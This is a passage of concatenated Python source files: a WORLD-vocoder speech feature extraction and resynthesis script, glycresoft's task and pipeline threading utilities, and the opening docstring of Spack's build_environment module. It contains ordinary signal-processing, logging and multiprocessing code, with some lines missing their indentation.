parser.add_argument("--f0_dim_idx", default=1,
type=int, help="f0 dimension index")
parser.add_argument("--ap_dim_idx", default=-2,
type=int, help="ap dimension index")
# flags setting
parser.add_argument("--save_f0", default=True,
type=strtobool, help="if set True, features f0 will be saved")
parser.add_argument("--save_ap", default=False,
type=strtobool, help="if set True, features ap will be saved")
parser.add_argument("--save_spc", default=False,
type=strtobool, help="if set True, features spc will be saved")
parser.add_argument("--save_npow", default=True,
type=strtobool, help="if set True, features npow will be saved")
parser.add_argument("--save_extended", default=False,
type=strtobool, help="if set True, exteneded feature will be saved")
parser.add_argument("--save_vad", default=True,
type=strtobool, help="if set True, features vad_idx will be saved")
parser.add_argument("--overwrite", default=False,
type=strtobool, help="if set True, overwrite the exist feature files")
# other setting
parser.add_argument('--inv', default=True,
type=strtobool, help="if False, wav is restored from acoustic features")
parser.add_argument("--n_jobs", default=10,
type=int, help="number of parallel jobs")
parser.add_argument("--verbose", default=1,
type=int, help="log message level")
return parser.parse_args()
def rootdir_replace(filepath, extname=None, newdir=None):
    """Return *filepath* with its extension and/or directory replaced.

    Args:
        filepath (str): original path.
        extname (str): if given, new extension (without the dot).
        newdir (str): if given, new directory; defaults to the original one.

    Returns:
        str: rebuilt path using '/' separators.
    """
    filename = os.path.basename(filepath)
    rootdir = os.path.dirname(filepath)
    if extname is not None:  # was "!= None"; identity test is the idiom
        # NOTE: keeps only the part before the FIRST dot, so "a.b.wav"
        # becomes "a.<extname>" — preserved to match existing callers.
        filename = '%s.%s' % (filename.split('.')[0], extname)
    if newdir is None:  # was "== None"
        newdir = rootdir
    return '%s/%s' % (newdir, filename)
def extfrm(data, npow, power_threshold=-20):
    """Extract frames whose normalized power exceeds a threshold.

    Args:
        data (ndarray): feature matrix with shape (T, D).
        npow (ndarray): per-frame normalized power with shape (T,).
        power_threshold (float): keep frames with npow strictly above this.

    Returns:
        tuple: (extracted frames, ndarray of kept frame indices).

    Raises:
        ValueError: if data and npow have different lengths.
    """
    T = data.shape[0]
    if T != len(npow):
        # was `raise("...")` — raising a plain str is a TypeError in
        # Python 3; a proper exception type is required.
        raise ValueError("Length of two vectors is different.")
    valid_index = np.where(npow > power_threshold)
    extdata = data[valid_index]
    assert extdata.shape[0] <= T
    return extdata, valid_index[0]
def low_cut_filter(x, fs, cutoff=70):
"""FUNCTION TO APPLY LOW CUT FILTER
Args:
x (ndarray): Waveform sequence
fs (int): Sampling frequency
cutoff (float): Cutoff frequency of low cut filter
Return:
(ndarray): Low cut filtered waveform sequence
"""
nyquist = fs // 2
norm_cutoff = cutoff / nyquist
# low cut filter
fil = firwin(255, norm_cutoff, pass_zero=False)
lcf_x = lfilter(fil, 1, x)
return lcf_x
def low_pass_filter(x, fs, cutoff=70, padding=True):
    """Apply a low-pass FIR filter to a waveform.

    Args:
        x (ndarray): Waveform sequence
        fs (int): Sampling frequency
        cutoff (float): Cutoff frequency of low pass filter
        padding (bool): NOTE(review) — this argument is currently
            ignored; edge padding is always applied. Confirm intent.

    Return:
        (ndarray): Low pass filtered waveform sequence, same length as x
    """
    numtaps = 255
    # normalize the cutoff by the Nyquist frequency (integer half of fs)
    norm_cutoff = cutoff / (fs // 2)
    taps = firwin(numtaps, norm_cutoff)
    # edge-pad so the filter transient falls outside the signal
    padded = np.pad(x, (numtaps, numtaps), 'edge')
    filtered = lfilter(taps, 1, padded)
    # drop the pad plus the FIR group delay, restoring the input length
    return filtered[numtaps + numtaps // 2: -numtaps // 2]
def extend_time(feats, upsampling_factor):
    """EXTEND TIME RESOLUTION

    Repeat each feature frame ``upsampling_factor`` times along the
    time axis.

    Args:
        feats (ndarray): feature vector with the shape (T x D)
        upsampling_factor (int): upsampling_factor

    Return:
        (ndarray): extend feats with the shape (upsampling_factor*T x D),
        always float64 (matching the original zeros-buffer behavior).
    """
    # cast first so the result dtype matches the old float64 buffer
    frames = np.asarray(feats, dtype=np.float64)
    return np.repeat(frames, upsampling_factor, axis=0)
def convert_continuos_f0(f0):
    """CONVERT F0 TO CONTINUOUS F0

    Interpolate across unvoiced (zero) regions so the returned contour
    is continuous, and return the voiced/unvoiced mask.

    Args:
        f0 (ndarray): original f0 sequence with the shape (T)

    Return:
        (ndarray): binary voiced(1)/unvoiced(0) mask with the shape (T)
        (ndarray): continuous f0 with the shape (T); the input f0 is
        returned unchanged when every frame is unvoiced.
    """
    # get uv information as binary
    uv = np.float32(f0 != 0)
    # degenerate case: nothing voiced, nothing to interpolate
    if (f0 == 0).all():
        # logging.warn is deprecated; use logging.warning
        logging.warning("all of the f0 values are 0.")
        return uv, f0
    # first/last voiced values, used to pad the contour edges
    start_f0 = f0[f0 != 0][0]
    end_f0 = f0[f0 != 0][-1]
    # ndarray.copy() replaces the needlessly heavy copy.deepcopy()
    cont_f0 = f0.copy()
    start_idx = np.where(cont_f0 == start_f0)[0][0]
    end_idx = np.where(cont_f0 == end_f0)[0][-1]
    cont_f0[:start_idx] = start_f0
    cont_f0[end_idx:] = end_f0
    # linearly interpolate across the remaining zero (unvoiced) frames
    nz_frames = np.where(cont_f0 != 0)[0]
    f = interp1d(nz_frames, cont_f0[nz_frames])
    cont_f0 = f(np.arange(0, cont_f0.shape[0]))
    return uv, cont_f0
def featpath_create(wav_list, feature_format):
    """Create output directories for the feature files.

    Mirrors each wav path, substituting "wav" with *feature_format*
    (note: str.replace swaps EVERY occurrence of "wav" in the path,
    which is how this codebase maps wav trees to feature trees).

    Args:
        wav_list (list): wav file paths.
        feature_format (str): e.g. "h5".
    """
    for wav_name in wav_list:
        feat_dir = os.path.dirname(wav_name.replace("wav", feature_format))
        # exist_ok avoids the check-then-create race of the old
        # os.path.exists() guard when several jobs run in parallel;
        # the truthiness guard skips bare filenames (empty dirname).
        if feat_dir:
            os.makedirs(feat_dir, exist_ok=True)
def wavpath_create(wav_list, feature_format):
    """Create output directories for restored waveform files.

    Mirrors each wav path, substituting "wav" with
    "<feature_format>_restored" (str.replace swaps every occurrence).

    Args:
        wav_list (list): wav file paths.
        feature_format (str): e.g. "h5".
    """
    for wav_name in wav_list:
        restored_dir = os.path.dirname(
            wav_name.replace("wav", feature_format + "_restored"))
        # exist_ok avoids the check-then-create race of the old
        # os.path.exists() guard when several jobs run in parallel.
        if restored_dir:
            os.makedirs(restored_dir, exist_ok=True)
def world_speech_synthesis(queue, wav_list, args):
    """WORLD SPEECH SYNTHESIS

    Re-synthesize waveforms from previously extracted WORLD features
    and write them as 16-bit PCM wav files.

    Parameters
    ----------
    queue : multiprocessing.Queue()
        the queue to store the file name of utterance
    wav_list : list
        list of the wav files
    args :
        feature extract arguments
    """
    # define synthesizer (fixed typo: "ynthesizer")
    synthesizer = Synthesizer(fs=args.fs,
                              fftl=args.fftl,
                              shiftms=args.shiftms)
    # synthesis
    for i, wav_name in enumerate(wav_list):
        if args.feature_dir is None:  # was "== None"
            restored_name = wav_name.replace("wav", args.feature_format + "_restored")
            restored_name = restored_name.replace(".%s" % args.feature_format + "_restored", ".wav")
            feat_name = wav_name.replace("wav", args.feature_format)
        else:
            restored_name = rootdir_replace(wav_name, newdir=args.feature_dir + "restored")
            feat_name = rootdir_replace(wav_name, extname=args.feature_format, newdir=args.feature_dir)
        if os.path.exists(restored_name):
            if args.overwrite:
                logging.info("overwrite %s (%d/%d)" % (restored_name, i + 1, len(wav_list)))
            else:
                logging.info("skip %s (%d/%d)" % (restored_name, i + 1, len(wav_list)))
                continue
        else:
            logging.info("now processing %s (%d/%d)" % (restored_name, i + 1, len(wav_list)))
        # load acoustic features; the /world dataset is mandatory
        if check_hdf5(feat_name, "/world"):
            h = read_hdf5(feat_name, "/world")
        else:
            logging.error("%s is not existed." % (feat_name))
            sys.exit(1)
        if check_hdf5(feat_name, "/f0"):
            f0 = read_hdf5(feat_name, "/f0")
        else:
            # rebuild f0 from the continuous-f0 column, zeroing frames
            # the uv mask (column 0) marks as unvoiced
            uv = h[:, 0].copy(order='C')
            f0 = h[:, args.f0_dim_idx].copy(order='C')  # cont_f0_lpf
            fz_idx = np.where(uv == 0.0)
            f0[fz_idx] = 0.0
        if check_hdf5(feat_name, "/ap"):
            ap = read_hdf5(feat_name, "/ap")
        else:
            # decode coded aperiodicity back to full-band aperiodicity
            codeap = h[:, args.ap_dim_idx:].copy(order='C')
            ap = pyworld.decode_aperiodicity(codeap, args.fs, args.fftl)
        mcep = h[:, args.mcep_dim_start:args.mcep_dim_end].copy(order='C')
        # waveform synthesis
        wav = synthesizer.synthesis(f0,
                                    mcep,
                                    ap,
                                    alpha=args.mcep_alpha)
        # clip to the int16 range before casting to avoid wrap-around
        wav = np.clip(wav, -32768, 32767)
        wavfile.write(restored_name, args.fs, wav.astype(np.int16))
    queue.put('Finish')
def world_feature_extract(queue, wav_list, args):
    """EXTRACT WORLD FEATURE VECTOR

    Extract WORLD features (uv, continuous low-pass-filtered f0, mcep,
    coded ap) from each wav and save them into an HDF5 feature file.

    Parameters
    ----------
    queue : multiprocessing.Queue()
        the queue to store the file name of utterance
    wav_list : list
        list of the wav files
    args :
        feature extract arguments
    """
    # define feature extractor
    feature_extractor = FeatureExtractor(
        analyzer="world",
        fs=args.fs,
        shiftms=args.shiftms,
        minf0=args.minf0,
        maxf0=args.maxf0,
        fftl=args.fftl)
    # extraction
    for i, wav_name in enumerate(wav_list):
        # check exists
        if args.feature_dir is None:  # was "== None"
            feat_name = wav_name.replace("wav", args.feature_format)
        else:
            feat_name = rootdir_replace(wav_name, extname=args.feature_format, newdir=args.feature_dir)
        if check_hdf5(feat_name, "/world"):
            if args.overwrite:
                logging.info("overwrite %s (%d/%d)" % (wav_name, i + 1, len(wav_list)))
            else:
                logging.info("skip %s (%d/%d)" % (wav_name, i + 1, len(wav_list)))
                continue
        else:
            logging.info("now processing %s (%d/%d)" % (wav_name, i + 1, len(wav_list)))
        # load wavfile
        fs, x = wavfile.read(wav_name)
        x = np.array(x, dtype=np.float32)
        # check the sampling frequency BEFORE filtering, so no work is
        # wasted when the file is rejected anyway
        if not fs == args.fs:
            logging.error("sampling frequency is not matched.")
            sys.exit(1)
        if args.highpass_cutoff != 0:
            x = low_cut_filter(x, fs, cutoff=args.highpass_cutoff)
        # extract features
        f0, spc, ap = feature_extractor.analyze(x)
        codeap = feature_extractor.codeap()
        mcep = feature_extractor.mcep(dim=args.mcep_dim, alpha=args.mcep_alpha)
        npow = feature_extractor.npow()
        uv, cont_f0 = convert_continuos_f0(f0)
        # the f0 track is sampled once per frame shift
        lpf_fs = int(1.0 / (args.shiftms * 0.001))
        cont_f0_lpf = low_pass_filter(cont_f0, lpf_fs, cutoff=20)
        # if smoothing pushed the contour to/below zero, retry with a
        # progressively wider (doubled) cutoff until it stays positive
        next_cutoff = 70
        while not (cont_f0_lpf > 0).all():  # was the obscure "> [0]"
            logging.info("%s low-pass-filtered [%dHz]" % (feat_name, next_cutoff))
            cont_f0_lpf = low_pass_filter(cont_f0, lpf_fs, cutoff=next_cutoff)
            next_cutoff *= 2
        # concatenate into the (T x D) /world feature matrix
        cont_f0_lpf = np.expand_dims(cont_f0_lpf, axis=-1)
        uv = np.expand_dims(uv, axis=-1)
        feats = np.concatenate([uv, cont_f0_lpf, mcep, codeap], axis=1)
        # save feature
        write_hdf5(feat_name, "/world", feats)
        if args.save_f0:
            write_hdf5(feat_name, "/f0", f0)
        if args.save_ap:
            write_hdf5(feat_name, "/ap", ap)
        if args.save_spc:
            write_hdf5(feat_name, "/spc", spc)
        if args.save_npow:
            write_hdf5(feat_name, "/npow", npow)
        if args.save_extended:
            # extend time resolution to one frame per waveform sample
            upsampling_factor = int(args.shiftms * fs * 0.001)
            feats_extended = extend_time(feats, upsampling_factor)
            feats_extended = feats_extended.astype(np.float32)
            write_hdf5(feat_name, "/world_extend", feats_extended)
        if args.save_vad:
            _, vad_idx = extfrm(mcep, npow, power_threshold=args.pow_th)
            write_hdf5(feat_name, "/vad_idx", vad_idx)
    queue.put('Finish')
def main():
    """Entry point: parse arguments, configure logging, and fan the
    feature extraction (or waveform restoration) out over worker
    processes."""
    # parse arguments
    args = _get_arguments()
    # set log level
    if args.verbose == 1:
        logging.basicConfig(level=logging.INFO,
                            format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
                            datefmt='%m/%d/%Y %I:%M:%S')
    elif args.verbose > 1:
        logging.basicConfig(level=logging.DEBUG,
                            format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
                            datefmt='%m/%d/%Y %I:%M:%S')
    else:
        logging.basicConfig(level=logging.WARN,
                            format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
                            datefmt='%m/%d/%Y %I:%M:%S')
        # logging.warn is deprecated; use logging.warning
        logging.warning("logging is disabled.")
    # show arguments
    for key, value in vars(args).items():
        logging.info("%s = %s" % (key, str(value)))
    # read list: a directory is globbed, anything else is a list file
    if os.path.isdir(args.waveforms):
        file_list = sorted(find_files(args.waveforms, "*.wav"))
    else:
        file_list = read_txt(args.waveforms)
    logging.info("number of utterances = %d" % len(file_list))
    # set mode
    if args.feature_type == "world":
        if args.inv:
            target_fn = world_feature_extract
            filepath_create = featpath_create
        else:
            target_fn = world_speech_synthesis
            filepath_create = wavpath_create
    else:
        raise NotImplementedError("Currently, only support world.")
    # create file folders
    if args.feature_dir is None:  # was "== None"
        filepath_create(file_list, args.feature_format)
    else:
        # NOTE: feature_dir is joined by plain concatenation here and in
        # world_speech_synthesis, so it is expected to end with "/"
        featdir = args.feature_dir
        os.makedirs(featdir, exist_ok=True)
        os.makedirs(featdir + "restored/", exist_ok=True)
    # divide list into one chunk per worker
    file_lists = np.array_split(file_list, args.n_jobs)
    file_lists = [f_list.tolist() for f_list in file_lists]
    # multi processing
    processes = []
    queue = mp.Queue()
    for f in file_lists:
        p = mp.Process(target=target_fn, args=(queue, f, args,))
        p.start()
        processes.append(p)
    # wait for all process
    for p in processes:
        p.join()
# Script entry point: run feature extraction / synthesis when invoked directly.
if __name__ == "__main__":
    main()
|
task.py | from __future__ import print_function
import logging
import pprint
import traceback
import multiprocessing
import threading
import six
from multiprocessing.managers import SyncManager
from datetime import datetime
try:
from Queue import Empty
except ImportError:
from queue import Empty
from glycan_profiling.version import version
logger = logging.getLogger("glycan_profiling.task")
def display_version(print_fn):
    """Emit the glycresoft version banner through *print_fn*."""
    print_fn("glycresoft: version %s" % version)
def ensure_text(obj):
    """Coerce *obj* to the native text type (unicode on py2, str on py3)."""
    return unicode(obj) if six.PY2 else str(obj)
def fmt_msg(*message):
    """Join the message parts and prefix them with an ISO timestamp."""
    stamp = ensure_text(datetime.now().isoformat(' '))
    body = u', '.join(map(ensure_text, message))
    return u"%s %s" % (stamp, body)
# Default print hook for LoggingMixin; *obj* is the calling task (ignored
# here, but the signature must accept it because it is used like a method).
def printer(obj, *message):
    print(fmt_msg(*message))
# Debug print hook for LoggingMixin: only emits when the owning object
# reports that debug mode is enabled.
def debug_printer(obj, *message):
    if obj.in_debug_mode():
        print(u"DEBUG:" + fmt_msg(*message))
class CallInterval(object):
    """Invoke a callback every `interval` seconds from a daemon thread.

    Attributes
    ----------
    stopped: threading.Event
        A semaphore lock that controls when to run `call_target`
    call_target: callable
        The thing to call every `interval` seconds
    args: iterable
        Arguments for `call_target`
    interval: number
        Time between calls to `call_target`
    """

    def __init__(self, interval, call_target, *args):
        self.stopped = threading.Event()
        self.interval = interval
        self.call_target = call_target
        self.args = args
        self.thread = threading.Thread(target=self.mainloop)
        # daemon thread: never blocks interpreter shutdown
        self.thread.daemon = True

    def mainloop(self):
        # Event.wait returns False on timeout (time to fire the callback)
        # and True once stop() sets the event, which ends the loop.
        while not self.stopped.wait(self.interval):
            try:
                self.call_target(*self.args)
            except Exception as exc:
                logger.exception("An error occurred in %r", self, exc_info=exc)

    def start(self):
        self.thread.start()

    def stop(self):
        self.stopped.set()
class MessageSpooler(object):
    """An IPC-based logging helper

    Attributes
    ----------
    halting : bool
        Whether the object is attempting to
        stop, so that the internal thread can
        tell when it should stop and tell other
        objects using it it is trying to stop
    handler : Callable
        A Callable object which can be used to do
        the actual logging
    message_queue : multiprocessing.Queue
        The Inter-Process Communication queue
    thread : threading.Thread
        The internal listener thread that will consume
        message_queue work items
    """

    def __init__(self, handler):
        self.handler = handler
        self.message_queue = multiprocessing.Queue()
        self.halting = False
        self.thread = threading.Thread(target=self.run)
        self.thread.start()

    def run(self):
        """Consume messages until stop() flips the halting flag."""
        while not self.halting:
            try:
                # short timeout so the halting flag is re-checked regularly
                message = self.message_queue.get(True, 2)
            except Empty:
                continue
            try:
                self.handler(*message)
            except Exception:
                # Previously a blanket `except Exception: continue`
                # silently swallowed handler failures along with the
                # queue timeout. A broken handler must not kill the
                # thread, but the failure should be visible.
                logger.exception("Error while handling log message %r", message)

    def stop(self):
        """Signal the listener thread to exit and wait for it."""
        self.halting = True
        self.thread.join()

    def sender(self):
        """Return a picklable callable that feeds this spooler's queue."""
        return MessageSender(self.message_queue)
class MessageSender(object):
    """A simple callable that pushes message tuples into an IPC queue.

    Attributes
    ----------
    queue : multiprocessing.Queue
        The Inter-Process Communication queue
    """

    def __init__(self, queue):
        self.queue = queue

    def send(self, *message):
        # the positional arguments travel as a single tuple
        self.queue.put(message)

    def __call__(self, *message):
        # calling the sender is shorthand for send()
        self.send(*message)
def humanize_class_name(name):
    """Split a CamelCase class name into space-separated words.

    A word boundary is an uppercase letter followed by a lowercase one,
    so acronym runs stay together: "HTTPServer" -> "HTTP Server".
    """
    words = []
    start = 0
    for idx in range(1, len(name)):
        # split only where an Upper+lower pair begins a new word
        if (name[idx].isupper() and idx != start
                and idx + 1 < len(name) and name[idx + 1].islower()):
            words.append(name[start:idx])
            start = idx
    words.append(name[start:])
    return ' '.join(words)
class LoggingMixin(object):
    """Mixin supplying shared ``log``/``debug``/``error`` helpers.

    The printing callables live on the mixin class itself, so
    reconfiguring them affects every inheriting class at once.
    """

    logger_state = None
    print_fn = printer
    debug_print_fn = debug_printer
    error_print_fn = printer

    @classmethod
    def log_with_logger(cls, logger):
        # assign on LoggingMixin (not cls) so the change is global
        LoggingMixin.logger_state = logger
        LoggingMixin.print_fn = logger.info
        LoggingMixin.debug_print_fn = logger.debug
        LoggingMixin.error_print_fn = logger.error

    @classmethod
    def log_to_stdout(cls):
        # restore the plain print-based hooks
        cls.logger_state = None
        cls.print_fn = printer
        cls.debug_print_fn = debug_printer
        cls.error_print_fn = printer

    def log(self, *message):
        text = u', '.join(map(ensure_text, message))
        self.print_fn(text)

    def debug(self, *message):
        text = u', '.join(map(ensure_text, message))
        self.debug_print_fn(text)

    def error(self, *message, **kwargs):
        text = u', '.join(map(ensure_text, message))
        self.error_print_fn(text)
        if kwargs.get("exception") is not None:
            # append the current traceback for the supplied exception
            self.error_print_fn(traceback.format_exc())

    def ipc_logger(self, handler=None):
        if handler is None:
            def handler(message):
                # default: route IPC messages through our own log()
                self.log(message)
        return MessageSpooler(handler)
class TaskBase(LoggingMixin):
    """A base class for a discrete, named step in a pipeline that
    executes in sequence.

    Subclasses implement ``run()``; callers invoke ``start()``.

    Attributes
    ----------
    debug_print_fn : Callable
        The function called to print debug messages
    display_fields : bool
        Whether to display fields at the start of execution
    end_time : datetime.datetime
        The time when the task ended
    error_print_fn : Callable
        The function called to print error messages
    logger_state : logging.Logger
        The Logger bound to this task
    print_fn : Callable
        The function called to print status messages
    start_time : datetime.datetime
        The time when the task began
    status : str
        The state of the executing task; on failure start() stores the
        raised exception object here and summarize() formats it
    """
    status = "new"
    # tri-state: None = undetermined, then cached True/False
    _debug_enabled = None
    display_fields = True
    _display_name = None

    @property
    def display_name(self):
        # fall back to a humanized version of the class name
        if self._display_name is None:
            return humanize_class_name(self.__class__.__name__)
        else:
            return self._display_name

    def in_debug_mode(self):
        """Return (and cache) whether debug logging is enabled."""
        if self._debug_enabled is None:
            logger_state = self.logger_state
            if logger_state is not None:
                # BUG FIX: isEnabledFor() takes a numeric level; passing
                # the string "DEBUG" raises TypeError on Python 3 when it
                # is compared against the logger's numeric level.
                self._debug_enabled = logger_state.isEnabledFor(logging.DEBUG)
        return bool(self._debug_enabled)

    def _format_fields(self):
        # pretty-print the public, non-None instance attributes
        if self.display_fields:
            return '\n' + pprint.pformat(
                {k: v for k, v in self.__dict__.items()
                 if not (k.startswith("_") or v is None)})
        else:
            return ''

    def display_header(self):
        display_version(self.log)

    def try_set_process_name(self, name=None):
        """This helper method may be used to try to change a process's name
        in order to make discriminating which role a particular process is
        fulfilling. This uses a third-party utility library that may not behave
        the same way on all platforms, and therefore this is done for convenience
        only.

        Parameters
        ----------
        name : str, optional
            A name to set. If not provided, will check the attribute ``process_name``
            for a non-null value, or else have no effect.
        """
        if name is None:
            name = getattr(self, 'process_name', None)
        if name is None:
            return
        _name_process(name)

    def _begin(self, verbose=True, *args, **kwargs):
        """Record the start time and announce the task."""
        self.on_begin()
        self.start_time = datetime.now()
        self.status = "started"
        if verbose:
            self.log(
                "Begin %s%s" % (
                    self.display_name,
                    self._format_fields()))

    def _end(self, verbose=True, *args, **kwargs):
        """Record the end time and emit the summary."""
        self.on_end()
        self.end_time = datetime.now()
        if verbose:
            self.log("End %s" % self.display_name)
            self.log(self.summarize())

    def on_begin(self):
        # subclass hook; called before timing starts
        pass

    def on_end(self):
        # subclass hook; called before timing stops
        pass

    def summarize(self):
        chunks = [
            "Started at %s." % self.start_time,
            "Ended at %s." % self.end_time,
            "Total time elapsed: %s" % (self.end_time - self.start_time),
            "%s completed successfully." % self.__class__.__name__ if self.status == 'completed' else
            "%s failed with error message %r" % (self.__class__.__name__, self.status),
            ''
        ]
        return '\n'.join(chunks)

    def start(self, *args, **kwargs):
        """Run the task: _begin(), run(), then _end() on success.

        NOTE: only KeyboardInterrupt is intercepted (and re-raised after
        recording it in ``status``); other exceptions propagate without
        being recorded.
        """
        self._begin(*args, **kwargs)
        try:
            out = self.run()
        except (KeyboardInterrupt) as e:
            logger.exception("An error occurred: %r", e, exc_info=e)
            self.status = e
            out = e
            raise e
        else:
            self.status = 'completed'
            self._end(*args, **kwargs)
        return out

    def interact(self, **kwargs):
        """Drop into an embedded IPython shell at the caller's frame."""
        from IPython.terminal.embed import InteractiveShellEmbed, load_default_config
        import sys
        config = kwargs.get('config')
        header = kwargs.pop('header', u'')
        compile_flags = kwargs.pop('compile_flags', None)
        if config is None:
            config = load_default_config()
            config.InteractiveShellEmbed = config.TerminalInteractiveShell
            kwargs['config'] = config
        # identify the embed site by the caller's file/line
        frame = sys._getframe(1)
        shell = InteractiveShellEmbed.instance(
            _init_location_id='%s:%s' % (
                frame.f_code.co_filename, frame.f_lineno), **kwargs)
        shell(header=header, stack_depth=2, compile_flags=compile_flags,
              _call_location_id='%s:%s' % (frame.f_code.co_filename, frame.f_lineno))
        InteractiveShellEmbed.clear_instance()
# Shared module-level TaskBase instance; presumably used elsewhere as a
# generic logging handle (the name suggests so) — TODO confirm usage.
log_handle = TaskBase()
class MultiEvent(object):
    """Treat a collection of Event objects as a single aggregate event."""

    def __init__(self, events):
        self.events = list(events)

    def set(self):
        for evt in self.events:
            evt.set()

    def is_set(self):
        # aggregate is set only when every member is set
        return all(evt.is_set() for evt in self.events)

    def wait(self, *args, **kwargs):
        # wait on EVERY event (no short-circuit), then combine the results
        outcomes = [evt.wait(*args, **kwargs) for evt in self.events]
        return all(outcomes)

    def clear(self):
        for evt in self.events:
            evt.clear()
class MultiLock(object):
    """Acquire and release a group of locks together, in listed order.

    Usable as a context manager: ``with MultiLock([...]):``.
    """

    def __init__(self, locks):
        self.locks = list(locks)

    def acquire(self):
        # acquisition order follows the list order given at construction
        for lock_obj in self.locks:
            lock_obj.acquire()

    def release(self):
        for lock_obj in self.locks:
            lock_obj.release()

    def __enter__(self):
        return self.acquire()

    def __exit__(self, *args):
        self.release()
class TaskExecutionSequence(TaskBase):
    """A task unit that executes in a separate thread or process.
    """
    def __call__(self):
        # Entry point invoked by the worker thread/process created in
        # start(); wraps run() with error reporting.
        result = None
        try:
            if self._running_in_process:
                self.log("%s running on PID %r" % (self, multiprocessing.current_process().pid))
            result = self.run()
            self.debug("%r Done" % self)
        except Exception as err:
            self.error("An error occurred while executing %s" %
                       self, exception=err)
            result = None
            self.set_error_occurred()
            # done_event may not exist on every subclass; signal it if present
            try:
                self.done_event.set()
            except AttributeError:
                pass
        finally:
            # NOTE: `return` inside `finally` also swallows any in-flight
            # exception not caught above (e.g. KeyboardInterrupt), by
            # Python's defined finally-return semantics.
            return result
    def run(self):
        # Subclasses must implement the actual work here.
        raise NotImplementedError()
    def _get_repr_details(self):
        # Subclass hook: extra text for __repr__.
        return ''
    # _thread: the Thread/Process once start() has been called.
    _thread = None
    # _running_in_process: True when start(process=True) was used.
    _running_in_process = False
    # _error_flag: threading.Event or multiprocessing.Event signalling failure.
    _error_flag = None
    def error_occurred(self):
        # False until start() creates the flag; afterwards reflects the event.
        if self._error_flag is None:
            return False
        else:
            return self._error_flag.is_set()
    def set_error_occurred(self):
        # No-op (returns False) before start() creates the flag.
        if self._error_flag is None:
            return False
        else:
            return self._error_flag.set()
    def __repr__(self):
        template = "{self.__class__.__name__}({details})"
        return template.format(self=self, details=self._get_repr_details())
    def _make_event(self, provider=None):
        # provider is the module supplying Event(): threading (default)
        # or multiprocessing for process-backed execution.
        if provider is None:
            provider = threading
        return provider.Event()
    def _name_for_execution_sequence(self):
        # Unique-ish worker name combining class name and object id.
        return ("%s-%r" % (self.__class__.__name__, id(self)))
    def start(self, process=False, daemon=False):
        """Launch this sequence in a Thread (default) or Process.

        Idempotent: returns the existing worker if already started.
        """
        if self._thread is not None:
            return self._thread
        if process:
            self._running_in_process = True
            self._error_flag = self._make_event(multiprocessing)
            t = multiprocessing.Process(
                target=self, name=self._name_for_execution_sequence())
            if daemon:
                t.daemon = daemon
        else:
            self._error_flag = self._make_event(threading)
            t = threading.Thread(
                target=self, name=self._name_for_execution_sequence())
            if daemon:
                t.daemon = daemon
        t.start()
        self._thread = t
        return t
    def join(self, timeout=None):
        # Returns True immediately when the error flag is set, without
        # waiting for the worker; otherwise delegates to the worker's join.
        if self.error_occurred():
            return True
        return self._thread.join(timeout)
    def is_alive(self):
        # A failed sequence is reported as not alive regardless of the
        # worker's actual state.
        if self.error_occurred():
            return False
        return self._thread.is_alive()
    def stop(self):
        # Cooperative stop: raising the error flag asks the worker to exit.
        if self.is_alive():
            self.set_error_occurred()
class Pipeline(TaskExecutionSequence):
    """Compose several TaskExecutionSequence members and drive them as one."""

    def __init__(self, tasks):
        self.tasks = tasks

    def start(self, *args, **kwargs):
        for member in self:
            member.start(*args, **kwargs)

    def join(self, timeout=None):
        if timeout is not None:
            for member in self:
                member.join(timeout)
        else:
            # Poll with a bounded per-member timeout so that a failing
            # member can bring the whole pipeline down promptly.
            timeout = max(60 // len(self), 2)
            while True:
                if self.error_occurred():
                    for member in self:
                        member.stop()
                still_running = 0
                for member in self:
                    member.join(timeout)
                    still_running += member.is_alive()
                if not still_running:
                    break

    def is_alive(self):
        # count (not bool) of members still running
        return sum(member.is_alive() for member in self)

    def error_occurred(self):
        # count (not bool) of members reporting an error
        return sum(member.error_occurred() for member in self.tasks)

    def stop(self):
        for member in self.tasks:
            member.stop()

    def __iter__(self):
        return iter(self.tasks)

    def __len__(self):
        return len(self.tasks)

    def __getitem__(self, i):
        return self.tasks[i]

    def add(self, task):
        self.tasks.append(task)
        return self
class SinkTask(TaskExecutionSequence):
    """Terminal pipeline stage that drains a queue until upstream is done."""

    def __init__(self, in_queue, in_done_event):
        self.in_queue = in_queue
        self.in_done_event = in_done_event
        self.done_event = self._make_event()

    def handle_item(self, task):
        # subclasses override this to consume each work item
        pass

    def process(self):
        while not self.error_occurred():
            try:
                self.handle_item(self.in_queue.get(True, 10))
            except Empty:
                # queue quiet: if the producer is finished, so are we
                if self.in_done_event.is_set():
                    break
        self.done_event.set()
def make_shared_memory_manager():
    """Start and return a SyncManager whose server process is renamed."""
    shm_manager = SyncManager()
    # rename the manager's server process for easier identification
    shm_manager.start(_name_process, ("glycresoft-shm", ))
    return shm_manager
def _name_process(name):
try:
import setproctitle
setproctitle.setproctitle(name)
except (ImportError, AttributeError):
pass
def elapsed(seconds):
    '''Convert a second count into a human readable duration

    Parameters
    ----------
    seconds : :class:`int`
        The number of seconds elapsed

    Returns
    -------
    :class:`str` :
        A formatted, comma separated list of units of duration in days, hours, minutes, and seconds
    '''
    periods = [
        ('day', 60 * 60 * 24),
        ('hour', 60 * 60),
        ('minute', 60),
        ('second', 1)
    ]
    tokens = []
    for period_name, period_seconds in periods:
        # ">=" (was ">") so exact multiples roll over (60 -> "1 minute",
        # not "60 seconds") and 1 second is not rendered as "".
        if seconds >= period_seconds:
            period_value, seconds = divmod(seconds, period_seconds)
            has_s = 's' if period_value > 1 else ''
            tokens.append("%s %s%s" % (period_value, period_name, has_s))
    return ", ".join(tokens)
|
build_environment.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
the package's module scope. Ths allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
